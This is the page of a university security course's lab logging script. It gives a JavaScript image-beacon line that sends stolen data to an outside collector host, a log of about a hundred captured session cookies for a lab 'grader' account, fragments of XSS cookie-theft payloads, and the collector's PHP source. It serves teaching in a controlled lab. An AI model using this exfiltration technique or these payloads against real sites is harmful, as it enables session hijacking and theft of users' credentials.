You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Wed, 19 Nov 2025 13:57:31 +0000: must: PyZoobarLogin=grader#b3215f1fe3a9a2b67bb3bd8737c26b758b699199591c8f320a192abb6a19cd66
Wed, 19 Nov 2025 13:56:14 +0000: must: PyZoobarLogin=grader#9e781a11c8670cdc8b447577235b5598cfbf991d82935ff2da8e39f99215a121
Wed, 19 Nov 2025 13:53:32 +0000: must: PyZoobarLogin=grader#1352f5ce2674f9d383c60e8a4a0e70a9bf89ae8c2d8acd1526b2edcdfe4333e5
Wed, 19 Nov 2025 13:50:21 +0000: hp2025: PyZoobarLogin=grader#134519fc3de28050cf8161d4a21f52a2b0a09b763abeea1bf0af21c9224dcf85
Wed, 19 Nov 2025 13:50:04 +0000: MUST: PyZoobarLogin=grader#7866100383fb6017274d2d39749d2d80055f87f5ff4186a79f07bec26101c85b
Wed, 19 Nov 2025 13:39:52 +0000: must: PyZoobarLogin=grader#94c5a8db3c7e49f2bccb530e028f5355ac9306c28a4fd8d42845b07d60462b71
Wed, 19 Nov 2025 13:39:47 +0000: hp2025: PyZoobarLogin=grader#ac4fe0ff7e4e94b5468cb92f2f57b81ef59b606f586c44192990fa646ff706f9
Wed, 19 Nov 2025 13:39:31 +0000: MUST: PyZoobarLogin=grader#51d95e8db253045fcf52b279c6f724699ba92a5b91eecacafbc5e63771d5a7f0
Wed, 19 Nov 2025 13:38:45 +0000: must: PyZoobarLogin=grader#f53856d40c29dda19c13668d9c1a3922c97b2191d409f4aaff330b7f0673b78e
Wed, 19 Nov 2025 13:36:26 +0000: must: PyZoobarLogin=grader#2e3304ab948cd58d74b28d78afe13c387197d7f602c341db21b5d296ef9798c7
Wed, 19 Nov 2025 13:35:42 +0000: hp2025: PyZoobarLogin=grader#c15b172ceca2741e556f500d825683b27eb78bbac5fc862e918dee053a630cab
Wed, 19 Nov 2025 13:35:25 +0000: MUST: PyZoobarLogin=grader#c8035991cde73169eb44fb7599dadb13cf0b3164af27714818e7a0cc11592aee
Wed, 19 Nov 2025 13:34:49 +0000: lab4: PyZoobarLogin=grader#a481964a75667dd16e48745f08a75307e9bf44e5e36d622eba74359c0c5eb4d5
Wed, 19 Nov 2025 13:33:08 +0000: lab4: PyZoobarLogin=grader#e548bdc5361a9dd2df9d05a01d7a60f7c4f7da102a1db9dfa57af52ff51a39ff
Wed, 19 Nov 2025 13:31:52 +0000: hp2025: PyZoobarLogin=grader#49cd86667196e68bf801851cecb3d7c5453dd8e536354f9477f6a842c81a0e3e
Wed, 19 Nov 2025 13:31:38 +0000: MUST: PyZoobarLogin=grader#508e9f87e7f57244774e562880704dfce92a0d73c09aa7d0b02d64d4c00d0ed8
Wed, 19 Nov 2025 13:30:47 +0000: lab4: PyZoobarLogin=grader#9f44f181473f97aef8a3dbb8bab85b9ffc5edaa54277be577e734aeb753fdbfd
Wed, 19 Nov 2025 13:30:30 +0000: hp2025: PyZoobarLogin=grader#78bd3f1041172614d1415af2e0e1a99edbee97f8d675199f0b0c46160cd001cb
Wed, 19 Nov 2025 13:30:17 +0000: MUST: PyZoobarLogin=grader#f1dd079f0d1b0a4350730cfdbaf16211f4820c1b89fdabb0db629686626f7ce0
Wed, 19 Nov 2025 13:25:16 +0000: lab4: PyZoobarLogin=grader#c381daadb840bf53f6dba1eb9ca21d02ed81c4ac61e7aa2aadf915699536bc4b
Wed, 19 Nov 2025 13:24:27 +0000: must: PyZoobarLogin=grader#19f7396680c95f91c0b3f1734784d3d4cc6ea2a93cbfa97547ddb5b010d79c02
Wed, 19 Nov 2025 13:24:03 +0000: hp2025: PyZoobarLogin=grader#da986de757c514aee985db514ce528668b432a7ada860f0e487a4bfa6736c551
Wed, 19 Nov 2025 13:23:58 +0000: hp2025: PyZoobarLogin=grader#3b93fdb6fe34c7c922a46951dd856d75d8b29867d0afe8bb75b78c49a103df8d
Wed, 19 Nov 2025 13:23:46 +0000: MUST: PyZoobarLogin=grader#c898f61c881fb0a7b88f6242d063777c02cd5f84cfeeb85d93d3c046abf65cb3
Wed, 19 Nov 2025 13:23:27 +0000: must: PyZoobarLogin=grader#37fab01348d9f2e0a2a3604d44db4b52ccc7f3af255cc454dbe735f0d1341736
Wed, 19 Nov 2025 13:21:22 +0000: must: PyZoobarLogin=grader#f33029b69af87a39654b3bfee98104c60050ab396a6b4586bf5582a3e235bcb8
Wed, 19 Nov 2025 13:21:21 +0000: lab4: PyZoobarLogin=grader#653a90b86f0eef41e48640a272f305c73fff38d96eaa311ecebb0ec5a660a71f
Wed, 19 Nov 2025 13:17:06 +0000: lab4: PyZoobarLogin=grader#3422ae65a7bdb43708ab4bc24441e2563b783fca3b441e257cffbb6f3c222048
Wed, 19 Nov 2025 13:14:18 +0000: lab4: PyZoobarLogin=grader#8049dfcbb68e424756206f318444568feb5a53226dd8f3ba92824e51be842de9
Wed, 19 Nov 2025 13:07:33 +0000: lab4: PyZoobarLogin=grader#8b6f9fd4a45ff9d2c86acd94ad4ab3044b378f8ad4c830dc7166643713c64bb4
Wed, 19 Nov 2025 13:05:28 +0000: lab4: PyZoobarLogin=grader#2cd6cd40a045e150ed0d602a23ece7cdb27417340ff542320cd1d561c2af0885
Wed, 19 Nov 2025 13:04:41 +0000: must: PyZoobarLogin=grader#07b7618a503930241222789bb14f349046b6e53b753820ea8081fa7120820f3e
Wed, 19 Nov 2025 13:03:39 +0000: must: PyZoobarLogin=grader#2fea68e39af24aef8cbf565d70ffb49c7ade84a73a8468d32d3f145ea34d920a
Wed, 19 Nov 2025 13:01:37 +0000: must: PyZoobarLogin=grader#21f83a5c3988c6a470b1e6283d844f2d93e33196cf9b588e026d6abe0089fc97
Wed, 19 Nov 2025 13:01:30 +0000: lab4: PyZoobarLogin=grader#6996b332830a20a4053c05dc8ae3f6bb944f6a8e0ec7d8ee69cf69242b474155
Wed, 19 Nov 2025 12:59:24 +0000: lab4: PyZoobarLogin=grader#14c0683761139654abf9dc3e02d2516f8dd06bd3af300399c7a926f7ca0e936b
Wed, 19 Nov 2025 12:57:05 +0000: lab4: PyZoobarLogin=grader#5f3633afc6f3fb37ce3891ff22dc1582f4362554643dabc164aad5fc78113755
Wed, 19 Nov 2025 12:54:43 +0000: lab4: " encodeURIComponent(document.cookie)</script
Wed, 19 Nov 2025 12:54:42 +0000: lab4: " encodeURIComponent(document.cookie)</script><style>.warning{display:none}</style
Wed, 19 Nov 2025 12:52:52 +0000: lab4: PyZoobarLogin=grader#b7a721a2051a48404bc6c8bbdde534ec30dfeed205b17e2645973d084dce3115
Wed, 19 Nov 2025 12:48:11 +0000: lab4: PyZoobarLogin=grader#8efa046081ca8e87f8a49f3f353307886ce751eba3b70eea7fdb21b4c8646e45
Wed, 19 Nov 2025 12:45:20 +0000: must: PyZoobarLogin=grader#8cd0cf7bf104228c0aad0088d5f0da379d28a338e87b4b1e94a945b586fafa4d
Wed, 19 Nov 2025 12:44:18 +0000: must: PyZoobarLogin=grader#6f2af6e43dce97804459f61a7eca29fcd26f4a270a4ba44f2bb73b16ff1da571
Wed, 19 Nov 2025 12:42:44 +0000: lab4: PyZoobarLogin=grader#47723f1b734d21cf176501fabbbc76a598a18b7958cfc6653ae32baa3abdaf9b
Wed, 19 Nov 2025 12:38:29 +0000: lab4: " encodeURIComponent(document.cookie) "
Wed, 19 Nov 2025 12:37:57 +0000: lab4: PyZoobarLogin=grader#a36fe71cbdafc71245b5af1a86b2b679de19b9fd5d34ccdf4b0d9c1823ccbe0c
Wed, 19 Nov 2025 12:26:31 +0000: must: PyZoobarLogin=grader#109746c5f1c834fb0aa6e6005fd383b16e3c052a3209bba335e5cccf75447247
Wed, 19 Nov 2025 12:25:30 +0000: must: PyZoobarLogin=grader#389b1bb4201f01ca342dbf5a66f5bd65c75946ea9edc6edc1d08a2d764824860
Wed, 19 Nov 2025 12:11:09 +0000: lab4: PyZoobarLogin=grader#a787aaa6ff2fdb9fd569074b25b4df87d9ab18458d6bd6a2147f1fde318bedf7
Wed, 19 Nov 2025 12:07:34 +0000: lab4: PyZoobarLogin=grader#5df710b87a6d18d543b7a13bbe65bc4cc97598b9fb37007df53ff95a21380986
Wed, 19 Nov 2025 11:52:15 +0000: lab4: PyZoobarLogin=grader#ec83f184dabe80e94af44c4460747b26f990b45ab52744a5d01341546b12cb85
Wed, 19 Nov 2025 11:48:10 +0000: lab4: PyZoobarLogin=grader#b0c2ed73426a5ac77394ed884335cbeca91a0e44612226576aff6053b5340213
Wed, 19 Nov 2025 11:26:09 +0000: scs: grader/PBNVBHXTMDGG
Wed, 19 Nov 2025 11:26:03 +0000: scs: grader/HYUBLXRMCZED
Wed, 19 Nov 2025 11:25:44 +0000: scs: PyZoobarLogin=grader#45159e2fd76498d118218367ce93cb15aee7979ebd43db54f8604561c654df65
Wed, 19 Nov 2025 11:25:38 +0000: scs: PyZoobarLogin=grader#0022da8e7e9154311675b8add2123f2103c31f308b80eb2c18d9894294999f57
Wed, 19 Nov 2025 11:25:24 +0000: scs: PyZoobarLogin=grader#2c3cad4878bbc8fc3ad2d310a41f77636113c4ee7f54a0d03b24e2928749f01d
Wed, 19 Nov 2025 11:21:22 +0000: hp2025: PyZoobarLogin=grader#b8f8a4ca08297c61ca075cd971261a890e1e7ae4a1340eb48d61acee09811315
Wed, 19 Nov 2025 11:21:17 +0000: hp2025: PyZoobarLogin=grader#fab52dfc3c7b832f65ab4865de7b16f1425d5f467312ae4faa48ec0f307599e6
Wed, 19 Nov 2025 11:21:04 +0000: MUST: PyZoobarLogin=grader#1a3246b8088e4ac1e204779dd2d95b71255b371c516a111b53192bd6c222d3ec
Wed, 19 Nov 2025 11:19:24 +0000: hp2025: PyZoobarLogin=grader#494a78d5b150bbdbd7c05dce6b9e3d0f952c298a945af3ad0d605dd3da428e2b
Wed, 19 Nov 2025 11:19:18 +0000: hp2025: PyZoobarLogin=grader#42fa86d986d67a7536277e23ada798ac8d54bbd546add89e5a0b57a39c67385e
Wed, 19 Nov 2025 11:19:02 +0000: MUST: PyZoobarLogin=grader#50bd1ed276e0fe9b0c335494a616de3917700a8f127c92f3050d97b08cbeb945
Wed, 19 Nov 2025 11:17:37 +0000: hp2025: PyZoobarLogin=grader#146e4869e8cdc42d91b1e01d53184f6698d421e4b054a961c89df211e9350434
Wed, 19 Nov 2025 11:17:31 +0000: hp2025: PyZoobarLogin=grader#02e6665d202eaf6da37433a19486a9a9a9db4bf4a14ee31aee2e020dc6b12beb
Wed, 19 Nov 2025 11:17:19 +0000: MUST: PyZoobarLogin=grader#5d6b5ba30228d202180783540a580f12759068a8ac2679c9b3e9f2d1b511321c
Wed, 19 Nov 2025 11:15:50 +0000: hp2025: PyZoobarLogin=grader#8bed18a5a83f9dbf27d493cc38f824dbccda31b0817e1d1b3535ec05a8c6f28d
Wed, 19 Nov 2025 11:15:44 +0000: hp2025: PyZoobarLogin=grader#7098bd9b7201c2315bf37a93b7435e8971a5ff7ab76221af107f08bc3e40f456
Wed, 19 Nov 2025 11:15:32 +0000: MUST: PyZoobarLogin=grader#e339a590d070cef91288c049f20ca4eb5bdebdad9d8d6c524faa3966141b6aff
Wed, 19 Nov 2025 11:13:20 +0000: lab4: PyZoobarLogin=grader#0e6317cb9ac14288bb66d7f7f6548e8fcb23a9a827e467f120e655d1a788ebec
Wed, 19 Nov 2025 11:11:02 +0000: lab4: " encodeURIComponent(document.cookie) "
Wed, 19 Nov 2025 11:09:22 +0000: lab4: " encodeURIComponent(document.cookie) "
Wed, 19 Nov 2025 11:00:35 +0000: lab4: PyZoobarLogin=grader#1dbcc7b97be7d1a90908bf6f21b16b894c1ee1ed5562fd4ff14c13405ec267e6
Wed, 19 Nov 2025 10:59:06 +0000: hp2025: PyZoobarLogin=grader#46c625526afb9defa08e43393f3e2eaf39dfd7a347569c017c78a44a6cee402a
Wed, 19 Nov 2025 10:59:00 +0000: hp2025: PyZoobarLogin=grader#23fbe422d40dc3f06b2497430c8af49b1209b781f6084ddca81ff4c23badbffb
Wed, 19 Nov 2025 10:58:47 +0000: MUST: PyZoobarLogin=grader#3099483bfbefbbc2da1e2a6f2fe565bdb6ae9ccbc85dd74164359c338ef674b6
Wed, 19 Nov 2025 10:53:37 +0000: lab4: PyZoobarLogin=grader#f8dc0b5188d6f3bf37903bbfd5d0f4d94fb60f83daa82747d61a07d5c74196d3
Wed, 19 Nov 2025 10:50:53 +0000: lab4: PyZoobarLogin=grader#29b7f6783d940e4932fdcfbd72c1774dad7426db38f304dfa292a23c20038f8d
Wed, 19 Nov 2025 10:47:00 +0000: yzh-must: grader#9863c13bab5f262ae323444d13b574459ca5d9636eb05ff04ff378779e447eba
Wed, 19 Nov 2025 10:43:37 +0000: lab4: PyZoobarLogin=grader3#b92147f96de6d1a381c04520b6401ce6d66b1eb9b35f37ca97bd5742b66d0465
Wed, 19 Nov 2025 10:43:29 +0000: lab4: PyZoobarLogin=grader2#502a085cb38c0ebce8d249f395c46729c1e03cd100eab8a7413d6a7d9fe65622
Wed, 19 Nov 2025 10:41:06 +0000: hp2025: PyZoobarLogin=grader#3644b17839a8726a97bc269ddc4279f491969b5a147d55363b1683a1f10d3fe0
Wed, 19 Nov 2025 10:40:59 +0000: hp2025: PyZoobarLogin=grader#5d30cacc610e54e889afb388f613edbf59301295c88befe4fe19abf931c51f5a
Wed, 19 Nov 2025 10:40:46 +0000: MUST: PyZoobarLogin=grader#505056b218f787afd1601d40b146c8b1473b4ee9d907a61055bd79b011ddeb95
Wed, 19 Nov 2025 10:38:18 +0000: hp2025: PyZoobarLogin=grader#2ae5b9b3a3d4254266700be2282342c6b9f31df608e71b3819c305203753fb3f
Wed, 19 Nov 2025 10:38:11 +0000: hp2025: PyZoobarLogin=grader#fa94ae676f8d1cc06cea9bb7884716ef91466e60323e64a8aebd602f7b27e896
Wed, 19 Nov 2025 10:37:57 +0000: MUST: PyZoobarLogin=grader#2b6d55531fc9df4bd72b2c6c6ddf21e62905e12b4e885071323d22219a0637a3
Wed, 19 Nov 2025 10:30:30 +0000: hp2025: PyZoobarLogin=grader#58fc82ec8c1f31f237a83cf43601e0587e582190967540e0f535639cd79bfd1d
Wed, 19 Nov 2025 10:30:22 +0000: hp2025: PyZoobarLogin=grader#eaf3a15777bde801af348c055abac9f2535fc3ba82d2ebfbf0a99aecc250cf15
Wed, 19 Nov 2025 10:30:06 +0000: MUST: PyZoobarLogin=grader#45015e912044cb326e058631105c83d1b25ca85dea647c2ccdf9af64975cb43e
Wed, 19 Nov 2025 10:25:57 +0000: hp2025: PyZoobarLogin=grader#2f18f325c49885f779a0bc6256ead01184cbcfaa79b683da16f8b7704340b77d
Wed, 19 Nov 2025 10:25:50 +0000: hp2025: PyZoobarLogin=grader#c021c4fa60a873d721bfd842f569e23d34f2150a6fa2d003f6b9875f4e3da937
Wed, 19 Nov 2025 10:25:35 +0000: MUST: PyZoobarLogin=grader#d526258c9a8c0a893887f0215f3b10349fd81881c1bb671cf8508a3113a97227
Wed, 19 Nov 2025 10:23:33 +0000: hp2025: PyZoobarLogin=grader#8aee3e156b2bf134af832fe208427bc24ba603f7cae0d0bd3e395a2370b6eb7d
Wed, 19 Nov 2025 10:23:27 +0000: hp2025: PyZoobarLogin=grader#b57a5dfb244c7034c1e8a0b0ff9cefcfa0a8fe52880d5b6c0452e8835bcf8c50
Wed, 19 Nov 2025 10:23:15 +0000: MUST: PyZoobarLogin=grader#f820951f6fedd1f69aa1b513215617406ce62047bb6eaf8e29668063e8738ec6
Wed, 19 Nov 2025 10:20:41 +0000: hp2025: PyZoobarLogin=grader#7746c5833fc4354ba007cf15cdc0a433153f3a9768e6bc6bc750a597c047a037
Wed, 19 Nov 2025 10:20:34 +0000: hp2025: PyZoobarLogin=grader#e315bbdb4df56ca502bd3950bde7d8947485b965b30ba557390e758d616620ff
Wed, 19 Nov 2025 10:20:21 +0000: MUST: PyZoobarLogin=grader#975762e56b175d17835462aaf9233b8b2d49a11cdf49d0ff1b7fe894fd284770
Wed, 19 Nov 2025 10:16:11 +0000: hp2025: PyZoobarLogin=grader#384eeb17ee7578fbad8e95fecc85fd4231ee852c43a443e7e1a06890f300fa85
Wed, 19 Nov 2025 10:16:05 +0000: hp2025: PyZoobarLogin=grader#4a1bd781b4fa6541562b883344866408ceb7acd3ca988d121d2210aad4574ce3
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.566-2024-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.566-2024-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>